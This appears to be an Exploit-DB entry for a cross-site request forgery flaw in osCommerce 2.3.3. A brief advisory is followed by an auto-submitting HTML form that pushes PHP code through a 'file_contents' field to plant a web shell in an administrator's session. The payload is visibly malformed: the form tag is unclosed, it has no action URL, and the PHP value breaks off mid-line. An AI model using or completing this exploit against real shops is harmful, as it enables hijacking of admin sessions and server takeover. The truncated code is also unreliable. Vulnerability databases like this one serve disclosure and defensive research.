osCommerce Cross Site Request Forgery Vulnerability

ID EDB-ID:38309
Type exploitdb
Reporter Jakub Galczyk
Modified 2013-02-12T00:00:00


osCommerce Cross Site Request Forgery Vulnerability. Webapps exploit for php platform

                                            source: http://www.securityfocus.com/bid/57892/info

osCommerce is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. 

Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. 

osCommerce 2.3.3 is vulnerable; other versions may also be affected.

The following example data is available: 

<html><body onload="document.runCSRF.submit();"> 
<form method="post" name="runCSRF" 
<input type="hidden" name="file_contents" 
value="<?php $cmd">
</form>your shell should be here: